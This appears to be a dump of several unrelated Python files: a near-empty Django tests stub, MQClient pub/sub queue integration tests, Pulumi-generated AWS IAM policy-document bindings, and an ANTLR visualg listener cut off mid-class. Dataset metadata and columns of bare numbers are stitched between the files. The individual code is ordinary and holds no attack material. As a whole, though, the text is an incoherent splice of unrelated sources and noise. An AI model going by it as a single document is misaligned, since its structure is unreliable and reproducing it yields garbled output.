"BSD-3-Clause"
] | null | null | null |
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
"BSD-3-Clause"
] | null | null | null |
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
"BSD-3-Clause"
] | 1
|
2022-02-14T05:33:39.000Z
|
2022-02-14T05:33:39.000Z
|
from django.test import TestCase
from django.contrib.sessions.backends import file, db, cache
from django.contrib.auth.views import login
| 34.5
| 60
| 0.833333
| 21
| 138
| 5.47619
| 0.666667
| 0.26087
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101449
| 138
| 4
| 61
| 34.5
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b1f51caa15d831e9a916bf36486abec53d4c967
| 16,601
|
py
|
Python
|
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | null | null | null |
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | 26
|
2020-07-22T15:21:55.000Z
|
2022-03-21T23:57:17.000Z
|
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | null | null | null |
"""Run integration tests for given backend, on Queue class."""
# pylint:disable=invalid-name
import logging
from multiprocessing.dummy import Pool as ThreadPool
from typing import Any, List
import pytest
# local imports
from ..backend_interface import Backend
from ..queue import Queue
from .utils import (
DATA_LIST,
_log_recv,
_log_recv_multiple,
_log_send,
all_were_received,
)
class PubSubQueue:
    """Integration test suite for Queue objects.

    Each ``test_*`` method exercises a pub/sub scenario against whatever
    backend the harness assigns to ``backend``.  Message order is not
    guaranteed by the backends, so most tests only check the full multiset
    of received messages via ``all_were_received``.
    """

    # Concrete backend instance is supplied by the per-backend test setup.
    backend = None  # type: Backend

    def test_10(self, queue_name: str) -> None:
        """Test one pub, one sub."""
        all_recvd: List[Any] = []
        # One Queue object serves as both publisher and subscriber here.
        pub_sub = Queue(self.backend, name=queue_name)
        pub_sub.send(DATA_LIST[0])
        _log_send(DATA_LIST[0])
        with pub_sub.recv_one() as d:
            all_recvd.append(_log_recv(d))
            assert d == DATA_LIST[0]
        for d in DATA_LIST:
            pub_sub.send(d)
            _log_send(d)
        # Short timeout so the recv() generator stops once the queue drains.
        pub_sub.timeout = 1
        with pub_sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                all_recvd.append(_log_recv(d))
                # assert d == DATA_LIST[i]  # we don't guarantee order
        assert all_were_received(all_recvd, [DATA_LIST[0]] + DATA_LIST)

    def test_11(self, queue_name: str) -> None:
        """Test an individual pub and an individual sub."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        pub.send(DATA_LIST[0])
        _log_send(DATA_LIST[0])
        sub = Queue(self.backend, name=queue_name)
        with sub.recv_one() as d:
            all_recvd.append(_log_recv(d))
            assert d == DATA_LIST[0]
        for d in DATA_LIST:
            pub.send(d)
            _log_send(d)
        sub.timeout = 1
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                all_recvd.append(_log_recv(d))
                # assert d == DATA_LIST[i]  # we don't guarantee order
        assert all_were_received(all_recvd, [DATA_LIST[0]] + DATA_LIST)

    def test_12(self, queue_name: str) -> None:
        """Failure-test one pub, two subs (one subscribed to wrong queue)."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        pub.send(DATA_LIST[0])
        _log_send(DATA_LIST[0])
        # A sub on a different queue name must find nothing.
        sub_fail = Queue(self.backend, name=f"{queue_name}-fail")
        with pytest.raises(Exception) as excinfo:
            with sub_fail.recv_one() as d:
                all_recvd.append(_log_recv(d))
        assert "No message available" in str(excinfo.value)
        # The correctly-subscribed sub still receives the message.
        sub = Queue(self.backend, name=queue_name)
        with sub.recv_one() as d:
            all_recvd.append(_log_recv(d))
            assert d == DATA_LIST[0]
        assert all_were_received(all_recvd, [DATA_LIST[0]])

    def test_20(self, queue_name: str) -> None:
        """Test one pub, multiple subs, ordered/alternatingly."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        # for each send, create and receive message via a new sub
        for data in DATA_LIST:
            pub.send(data)
            _log_send(data)
            sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                all_recvd.append(_log_recv(d))
                assert d == data
            # sub.close() -- no longer needed
        assert all_were_received(all_recvd)

    def _test_21(self, queue_name: str, num_subs: int) -> None:
        """Test one pub, multiple subs, unordered (front-loaded sending)."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        for data in DATA_LIST:
            pub.send(data)
            _log_send(data)

        def recv_thread(_: int) -> List[Any]:
            # Each worker drains whatever it can within the timeout.
            sub = Queue(self.backend, name=queue_name)
            sub.timeout = 1
            with sub.recv() as gen:
                recv_data_list = list(gen)
            return _log_recv_multiple(recv_data_list)

        with ThreadPool(num_subs) as p:
            received_data = p.map(recv_thread, range(num_subs))
        # Flatten the per-thread lists into one list of messages.
        all_recvd.extend(item for sublist in received_data for item in sublist)
        assert all_were_received(all_recvd)

    def test_21_fewer(self, queue_name: str) -> None:
        """Test one pub, multiple subs, unordered (front-loaded sending).

        Fewer subs than messages.
        """
        self._test_21(queue_name, len(DATA_LIST) // 2)

    def test_21_same(self, queue_name: str) -> None:
        """Test one pub, multiple subs, unordered (front-loaded sending).

        Same number of subs as messages.
        """
        self._test_21(queue_name, len(DATA_LIST))

    def test_21_more(self, queue_name: str) -> None:
        """Test one pub, multiple subs, unordered (front-loaded sending).

        More subs than messages.
        """
        self._test_21(queue_name, len(DATA_LIST) ** 2)

    def test_22(self, queue_name: str) -> None:
        """Test one pub, multiple subs, unordered (front-loaded sending).

        Use the same number of subs as number of messages.
        """
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        for data in DATA_LIST:
            pub.send(data)
            _log_send(data)

        def recv_thread(_: int) -> Any:
            # Each worker receives exactly one message.
            sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                recv_data = d
            # sub.close() -- no longer needed
            return _log_recv(recv_data)

        with ThreadPool(len(DATA_LIST)) as p:
            all_recvd = p.map(recv_thread, range(len(DATA_LIST)))
        assert all_were_received(all_recvd)

    def test_23(self, queue_name: str) -> None:
        """Failure-test one pub, and too many subs.

        More subs than messages with `recv_one()` will raise an
        exception.
        """
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        for data in DATA_LIST:
            pub.send(data)
            _log_send(data)

        def recv_thread(_: int) -> Any:
            sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                recv_data = d
            # sub.close() -- no longer needed
            return _log_recv(recv_data)

        with ThreadPool(len(DATA_LIST)) as p:
            all_recvd = p.map(recv_thread, range(len(DATA_LIST)))
        # Extra Sub: the queue is now empty, so one more recv_one() must fail.
        with pytest.raises(Exception) as excinfo:
            recv_thread(0)
        assert "No message available" in str(excinfo.value)
        assert all_were_received(all_recvd)

    def test_30(self, queue_name: str) -> None:
        """Test multiple pubs, one sub, ordered/alternatingly."""
        all_recvd: List[Any] = []
        sub = Queue(self.backend, name=queue_name)
        for data in DATA_LIST:
            # A fresh pub per message; the single sub drains after each send.
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
            sub.timeout = 1
            sub.except_errors = False
            with sub.recv() as gen:
                received_data = list(gen)
            all_recvd.extend(_log_recv_multiple(received_data))
            assert len(received_data) == 1
            assert data == received_data[0]
        assert all_were_received(all_recvd)

    def test_31(self, queue_name: str) -> None:
        """Test multiple pubs, one sub, unordered (front-loaded sending)."""
        all_recvd: List[Any] = []
        for data in DATA_LIST:
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
        sub = Queue(self.backend, name=queue_name)
        sub.timeout = 1
        with sub.recv() as gen:
            received_data = list(gen)
        all_recvd.extend(_log_recv_multiple(received_data))
        assert all_were_received(all_recvd)

    def test_40(self, queue_name: str) -> None:
        """Test multiple pubs, multiple subs, ordered/alternatingly.

        Use the same number of pubs as subs.
        """
        all_recvd: List[Any] = []
        for data in DATA_LIST:
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
            sub = Queue(self.backend, name=queue_name)
            sub.timeout = 1
            with sub.recv() as gen:
                received_data = list(gen)
            all_recvd.extend(_log_recv_multiple(received_data))
            assert len(received_data) == 1
            assert data == received_data[0]
        assert all_were_received(all_recvd)

    def test_41(self, queue_name: str) -> None:
        """Test multiple pubs, multiple subs, unordered (front-loaded sending).

        Use the same number of pubs as subs.
        """
        all_recvd: List[Any] = []
        for data in DATA_LIST:
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
        for _ in range(len(DATA_LIST)):
            sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                all_recvd.append(_log_recv(d))
            # sub.close() -- no longer needed
        assert all_were_received(all_recvd)

    def test_42(self, queue_name: str) -> None:
        """Test multiple pubs, multiple subs, unordered (front-loaded sending).

        Use the more pubs than subs.
        """
        all_recvd: List[Any] = []
        for data in DATA_LIST:
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
        for i in range(len(DATA_LIST)):
            if i % 2 == 0:  # each sub receives 2 messages back-to-back
                sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                all_recvd.append(_log_recv(d))
            # sub.close() -- no longer needed
        assert all_were_received(all_recvd)

    def test_43(self, queue_name: str) -> None:
        """Test multiple pubs, multiple subs, unordered (front-loaded sending).

        Use the fewer pubs than subs.
        """
        all_recvd: List[Any] = []
        for i, data in enumerate(DATA_LIST):
            if i % 2 == 0:  # each pub sends 2 messages back-to-back
                pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
        for _ in range(len(DATA_LIST)):
            sub = Queue(self.backend, name=queue_name)
            with sub.recv_one() as d:
                all_recvd.append(_log_recv(d))
            # sub.close() -- no longer needed
        assert all_were_received(all_recvd)

    def test_50(self, queue_name: str) -> None:
        """Test_20 with variable prefetching.

        One pub, multiple subs.
        """
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        # Sweep over prefetch values from 1 up to 2*len(DATA_LIST)-1.
        for i in range(1, len(DATA_LIST) * 2):
            # for each send, create and receive message via a new sub
            for data in DATA_LIST:
                pub.send(data)
                _log_send(data)
                sub = Queue(self.backend, name=queue_name, prefetch=i)
                with sub.recv_one() as d:
                    all_recvd.append(_log_recv(d))
                    assert d == data
                # sub.close() -- no longer needed
        assert all_were_received(all_recvd, DATA_LIST * ((len(DATA_LIST) * 2) - 1))

    def test_51(self, queue_name: str) -> None:
        """Test one pub, multiple subs, with prefetching.

        Prefetching should have no visible affect.
        """
        all_recvd: List[Any] = []
        for data in DATA_LIST:
            pub = Queue(self.backend, name=queue_name)
            pub.send(data)
            _log_send(data)
        # this should not eat up the whole queue
        sub = Queue(self.backend, name=queue_name, prefetch=20)
        with sub.recv_one() as d:
            all_recvd.append(_log_recv(d))
        with sub.recv_one() as d:
            all_recvd.append(_log_recv(d))
        # sub.close() -- no longer needed
        # A second sub with a small prefetch drains the remainder.
        sub2 = Queue(self.backend, name=queue_name, prefetch=2)
        sub2.timeout = 1
        with sub2.recv() as gen:
            for _, d in enumerate(gen):
                all_recvd.append(_log_recv(d))
        assert all_were_received(all_recvd)

    def test_60(self, queue_name: str) -> None:
        """Test recv() fail and recovery, with multiple recv() calls."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        for d in DATA_LIST:
            pub.send(d)
            _log_send(d)

        class TestException(Exception):  # pylint: disable=C0115
            pass

        sub = Queue(self.backend, name=queue_name)
        sub.timeout = 1
        # First pass: deliberately blow up on the third message.
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                if i == 2:
                    raise TestException()
                all_recvd.append(_log_recv(d))
                # assert d == DATA_LIST[i]  # we don't guarantee order
        logging.warning("Round 2!")
        # continue where we left off
        reused = False
        sub.timeout = 1
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                reused = True
                all_recvd.append(_log_recv(d))
                # assert d == DATA_LIST[i]  # we don't guarantee order
        assert reused
        print(all_recvd)
        assert all_were_received(all_recvd)

    def test_61(self, queue_name: str) -> None:
        """Test recv() fail and recovery, with error propagation."""
        all_recvd: List[Any] = []
        pub = Queue(self.backend, name=queue_name)
        for d in DATA_LIST:
            pub.send(d)
            _log_send(d)

        class TestException(Exception):  # pylint: disable=C0115
            pass

        sub = Queue(self.backend, name=queue_name)
        excepted = False
        try:
            sub.timeout = 1
            # except_errors=False makes recv() propagate our exception.
            sub.except_errors = False
            with sub.recv() as gen:
                for i, d in enumerate(gen):
                    if i == 2:
                        raise TestException()
                    all_recvd.append(_log_recv(d))
                    # assert d == DATA_LIST[i]  # we don't guarantee order
        except TestException:
            excepted = True
        assert excepted
        logging.warning("Round 2!")
        # continue where we left off
        reused = False
        sub.timeout = 1
        sub.except_errors = False
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                reused = True
                all_recvd.append(_log_recv(d))
                # assert d == DATA_LIST[i]  # we don't guarantee order
        assert reused
        assert all_were_received(all_recvd)

    def test_70_fail(self, queue_name: str) -> None:
        """Failure-test recv() with reusing a 'MessageGeneratorContext' instance."""
        pub = Queue(self.backend, name=queue_name)
        for d in DATA_LIST:
            pub.send(d)
            _log_send(d)
        sub = Queue(self.backend, name=queue_name)
        sub.timeout = 1
        recv_gen = sub.recv()
        with recv_gen as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                # assert d == DATA_LIST[i]  # we don't guarantee order
        logging.warning("Round 2!")
        # continue where we left off
        # Re-entering the same context object must raise.
        with pytest.raises(RuntimeError):
            with recv_gen as gen:
                assert 0  # we should never get here

    def test_80_break(self, queue_name: str) -> None:
        """Test recv() with a `break` statement."""
        pub = Queue(self.backend, name=queue_name)
        for d in DATA_LIST:
            pub.send(d)
            _log_send(d)
        sub = Queue(self.backend, name=queue_name)
        sub.timeout = 1
        all_recvd = []
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                all_recvd.append(_log_recv(d))
                if i == 2:
                    break  # NOTE: break is treated as a good exit, so the msg is acked
        logging.warning("Round 2!")
        # continue where we left off
        with sub.recv() as gen:
            for i, d in enumerate(gen):
                print(f"{i}: `{d}`")
                all_recvd.append(_log_recv(d))
        assert all_were_received(all_recvd)
| 31.986513
| 87
| 0.560629
| 2,179
| 16,601
| 4.0771
| 0.091785
| 0.064836
| 0.070239
| 0.087798
| 0.833859
| 0.818663
| 0.797501
| 0.778928
| 0.733003
| 0.706439
| 0
| 0.010506
| 0.33492
| 16,601
| 518
| 88
| 32.048263
| 0.794131
| 0.174749
| 0
| 0.764526
| 0
| 0
| 0.011914
| 0
| 0
| 0
| 0
| 0
| 0.100917
| 1
| 0.076453
| false
| 0.006116
| 0.021407
| 0
| 0.119266
| 0.024465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b22c64f62377df9bfcae2e0f7e42988777bbcba
| 28,240
|
py
|
Python
|
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetPolicyDocumentResult',
'AwaitableGetPolicyDocumentResult',
'get_policy_document',
'get_policy_document_output',
]
@pulumi.output_type
class GetPolicyDocumentResult:
    """
    A collection of values returned by getPolicyDocument.
    """
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- do not hand-edit logic.
    def __init__(__self__, id=None, json=None, override_json=None, override_policy_documents=None, policy_id=None, source_json=None, source_policy_documents=None, statements=None, version=None):
        # Each argument is type-checked, then stored via pulumi.set.
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if json and not isinstance(json, str):
            raise TypeError("Expected argument 'json' to be a str")
        pulumi.set(__self__, "json", json)
        if override_json and not isinstance(override_json, str):
            raise TypeError("Expected argument 'override_json' to be a str")
        if override_json is not None:
            # Deprecated input: warn but still accept and store it.
            warnings.warn("""Use the attribute \"override_policy_documents\" instead.""", DeprecationWarning)
            pulumi.log.warn("""override_json is deprecated: Use the attribute \"override_policy_documents\" instead.""")
        pulumi.set(__self__, "override_json", override_json)
        if override_policy_documents and not isinstance(override_policy_documents, list):
            raise TypeError("Expected argument 'override_policy_documents' to be a list")
        pulumi.set(__self__, "override_policy_documents", override_policy_documents)
        if policy_id and not isinstance(policy_id, str):
            raise TypeError("Expected argument 'policy_id' to be a str")
        pulumi.set(__self__, "policy_id", policy_id)
        if source_json and not isinstance(source_json, str):
            raise TypeError("Expected argument 'source_json' to be a str")
        if source_json is not None:
            # Deprecated input: warn but still accept and store it.
            warnings.warn("""Use the attribute \"source_policy_documents\" instead.""", DeprecationWarning)
            pulumi.log.warn("""source_json is deprecated: Use the attribute \"source_policy_documents\" instead.""")
        pulumi.set(__self__, "source_json", source_json)
        if source_policy_documents and not isinstance(source_policy_documents, list):
            raise TypeError("Expected argument 'source_policy_documents' to be a list")
        pulumi.set(__self__, "source_policy_documents", source_policy_documents)
        if statements and not isinstance(statements, list):
            raise TypeError("Expected argument 'statements' to be a list")
        pulumi.set(__self__, "statements", statements)
        if version and not isinstance(version, str):
            raise TypeError("Expected argument 'version' to be a str")
        pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The provider-assigned unique ID for this managed resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def json(self) -> str:
        """
        Standard JSON policy document rendered based on the arguments above.
        """
        return pulumi.get(self, "json")

    @property
    @pulumi.getter(name="overrideJson")
    def override_json(self) -> Optional[str]:
        # Deprecated; see override_policy_documents.
        return pulumi.get(self, "override_json")

    @property
    @pulumi.getter(name="overridePolicyDocuments")
    def override_policy_documents(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "override_policy_documents")

    @property
    @pulumi.getter(name="policyId")
    def policy_id(self) -> Optional[str]:
        return pulumi.get(self, "policy_id")

    @property
    @pulumi.getter(name="sourceJson")
    def source_json(self) -> Optional[str]:
        # Deprecated; see source_policy_documents.
        return pulumi.get(self, "source_json")

    @property
    @pulumi.getter(name="sourcePolicyDocuments")
    def source_policy_documents(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "source_policy_documents")

    @property
    @pulumi.getter
    def statements(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementResult']]:
        return pulumi.get(self, "statements")

    @property
    @pulumi.getter
    def version(self) -> Optional[str]:
        return pulumi.get(self, "version")
class AwaitableGetPolicyDocumentResult(GetPolicyDocumentResult):
    """Awaitable wrapper around GetPolicyDocumentResult (generated code)."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable `yield` makes this a generator function, so the
        # object is awaitable; awaiting it returns a plain result immediately.
        if False:
            yield self
        return GetPolicyDocumentResult(
            id=self.id,
            json=self.json,
            override_json=self.override_json,
            override_policy_documents=self.override_policy_documents,
            policy_id=self.policy_id,
            source_json=self.source_json,
            source_policy_documents=self.source_policy_documents,
            statements=self.statements,
            version=self.version)
def get_policy_document(override_json: Optional[str] = None,
                        override_policy_documents: Optional[Sequence[str]] = None,
                        policy_id: Optional[str] = None,
                        source_json: Optional[str] = None,
                        source_policy_documents: Optional[Sequence[str]] = None,
                        statements: Optional[Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']]] = None,
                        version: Optional[str] = None,
                        opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPolicyDocumentResult:
    """
    Generates an IAM policy document in JSON format for use with resources that
    expect policy documents, such as `iam.Policy`.

    Using this data source is *optional*: literal JSON strings, or raw policy
    documents read from files, are equally valid policy inputs.

    :param str override_json: IAM policy document whose statements with non-blank
           `sid`s override same-`sid` statements from the `source_json`,
           `source_policy_documents`, and `override_policy_documents` arguments.
           Non-overriding statements are added to the exported document.
    :param Sequence[str] override_policy_documents: List of IAM policy documents
           merged into the exported document. Statements with non-blank `sid`s
           override same-`sid` statements from earlier documents in the list and
           from `source_json`/`source_policy_documents`. Non-overriding statements
           are added to the exported document.
    :param str policy_id: ID for the policy document.
    :param str source_json: IAM policy document used as a base for the exported
           document; same-`sid` statements from `override_json` and
           `override_policy_documents` override its statements.
    :param Sequence[str] source_policy_documents: List of IAM policy documents
           merged into the exported document. Statements defined here or in
           `source_json` must have unique `sid`s; same-`sid` statements from
           `override_json`/`override_policy_documents` override them.
    :param Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']] statements:
           Configuration block for a policy statement.
    :param str version: IAM policy document version. Valid values are `2008-10-17`
           and `2012-10-17`; defaults to `2012-10-17`. See the AWS IAM User Guide
           on policy `Version` elements for details.
    """
    # Map the Python-style arguments onto the provider's camelCase invoke args.
    __args__ = {
        'overrideJson': override_json,
        'overridePolicyDocuments': override_policy_documents,
        'policyId': policy_id,
        'sourceJson': source_json,
        'sourcePolicyDocuments': source_policy_documents,
        'statements': statements,
        'version': version,
    }
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    invoke_result = pulumi.runtime.invoke(
        'aws:iam/getPolicyDocument:getPolicyDocument',
        __args__,
        opts=opts,
        typ=GetPolicyDocumentResult).value
    return AwaitableGetPolicyDocumentResult(
        id=invoke_result.id,
        json=invoke_result.json,
        override_json=invoke_result.override_json,
        override_policy_documents=invoke_result.override_policy_documents,
        policy_id=invoke_result.policy_id,
        source_json=invoke_result.source_json,
        source_policy_documents=invoke_result.source_policy_documents,
        statements=invoke_result.statements,
        version=invoke_result.version)
@_utilities.lift_output_func(get_policy_document)
def get_policy_document_output(override_json: Optional[pulumi.Input[Optional[str]]] = None,
                               override_policy_documents: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
                               policy_id: Optional[pulumi.Input[Optional[str]]] = None,
                               source_json: Optional[pulumi.Input[Optional[str]]] = None,
                               source_policy_documents: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
                               statements: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']]]]] = None,
                               version: Optional[pulumi.Input[Optional[str]]] = None,
                               opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPolicyDocumentResult]:
    """
    Output-typed variant of `get_policy_document`: accepts `pulumi.Input` values
    and returns a `pulumi.Output[GetPolicyDocumentResult]`. The actual invoke is
    performed by `get_policy_document` via the `lift_output_func` decorator; see
    that function for full argument semantics and usage examples.

    :param str override_json: IAM policy document whose statements with non-blank
           `sid`s override same-`sid` statements from the source/override
           document arguments; non-overriding statements are added.
    :param Sequence[str] override_policy_documents: Policy documents merged into
           the exported document; later non-blank `sid`s override earlier ones
           and those from `source_json`/`source_policy_documents`.
    :param str policy_id: ID for the policy document.
    :param str source_json: IAM policy document used as a base for the exported
           document.
    :param Sequence[str] source_policy_documents: Policy documents merged into
           the exported document; statements here and in `source_json` must have
           unique `sid`s.
    :param Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']] statements:
           Configuration block for a policy statement.
    :param str version: IAM policy document version, `2008-10-17` or
           `2012-10-17` (default `2012-10-17`).
    """
    ...
| 39.718706
| 495
| 0.63704
| 2,898
| 28,240
| 6.015528
| 0.096273
| 0.034073
| 0.086732
| 0.027534
| 0.848678
| 0.818849
| 0.797855
| 0.757873
| 0.736419
| 0.721046
| 0
| 0.005086
| 0.255064
| 28,240
| 710
| 496
| 39.774648
| 0.823597
| 0.669405
| 0
| 0.092857
| 1
| 0
| 0.174651
| 0.077622
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092857
| false
| 0
| 0.05
| 0.05
| 0.235714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b286ca068eceee4e35c744914d9e13ecac7852e
| 10,868
|
py
|
Python
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2021-01-17T19:17:06.000Z
|
2021-01-17T19:17:06.000Z
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2021-01-14T13:45:37.000Z
|
2021-06-10T14:55:08.000Z
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2020-12-23T22:00:42.000Z
|
2020-12-23T22:00:42.000Z
|
# Generated from visualg.g4 by ANTLR 4.9.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .visualgParser import visualgParser
else:
from visualgParser import visualgParser
class visualgListener(ParseTreeListener):
    """Complete listener for parse trees produced by visualgParser.

    Every callback is a no-op; subclass and override only the rules of
    interest. (Generated-style ANTLR listener — one enter/exit pair per
    grammar rule.)
    """

    def enterProg(self, ctx: visualgParser.ProgContext):
        """Enter a parse tree produced by visualgParser#prog."""

    def exitProg(self, ctx: visualgParser.ProgContext):
        """Exit a parse tree produced by visualgParser#prog."""

    def enterVariaveis_globais(self, ctx: visualgParser.Variaveis_globaisContext):
        """Enter a parse tree produced by visualgParser#variaveis_globais."""

    def exitVariaveis_globais(self, ctx: visualgParser.Variaveis_globaisContext):
        """Exit a parse tree produced by visualgParser#variaveis_globais."""

    def enterVariaveis_locais(self, ctx: visualgParser.Variaveis_locaisContext):
        """Enter a parse tree produced by visualgParser#variaveis_locais."""

    def exitVariaveis_locais(self, ctx: visualgParser.Variaveis_locaisContext):
        """Exit a parse tree produced by visualgParser#variaveis_locais."""

    def enterFuncoes(self, ctx: visualgParser.FuncoesContext):
        """Enter a parse tree produced by visualgParser#funcoes."""

    def exitFuncoes(self, ctx: visualgParser.FuncoesContext):
        """Exit a parse tree produced by visualgParser#funcoes."""

    def enterParametros(self, ctx: visualgParser.ParametrosContext):
        """Enter a parse tree produced by visualgParser#parametros."""

    def exitParametros(self, ctx: visualgParser.ParametrosContext):
        """Exit a parse tree produced by visualgParser#parametros."""

    def enterExpressoes(self, ctx: visualgParser.ExpressoesContext):
        """Enter a parse tree produced by visualgParser#expressoes."""

    def exitExpressoes(self, ctx: visualgParser.ExpressoesContext):
        """Exit a parse tree produced by visualgParser#expressoes."""

    def enterChamar_funcao(self, ctx: visualgParser.Chamar_funcaoContext):
        """Enter a parse tree produced by visualgParser#chamar_funcao."""

    def exitChamar_funcao(self, ctx: visualgParser.Chamar_funcaoContext):
        """Exit a parse tree produced by visualgParser#chamar_funcao."""

    def enterConstCaractere(self, ctx: visualgParser.ConstCaractereContext):
        """Enter a parse tree produced by visualgParser#constCaractere."""

    def exitConstCaractere(self, ctx: visualgParser.ConstCaractereContext):
        """Exit a parse tree produced by visualgParser#constCaractere."""

    def enterConstNumerico(self, ctx: visualgParser.ConstNumericoContext):
        """Enter a parse tree produced by visualgParser#constNumerico."""

    def exitConstNumerico(self, ctx: visualgParser.ConstNumericoContext):
        """Exit a parse tree produced by visualgParser#constNumerico."""

    def enterConstBool(self, ctx: visualgParser.ConstBoolContext):
        """Enter a parse tree produced by visualgParser#constBool."""

    def exitConstBool(self, ctx: visualgParser.ConstBoolContext):
        """Exit a parse tree produced by visualgParser#constBool."""

    def enterConstVet(self, ctx: visualgParser.ConstVetContext):
        """Enter a parse tree produced by visualgParser#constVet."""

    def exitConstVet(self, ctx: visualgParser.ConstVetContext):
        """Exit a parse tree produced by visualgParser#constVet."""

    def enterEscreva(self, ctx: visualgParser.EscrevaContext):
        """Enter a parse tree produced by visualgParser#escreva."""

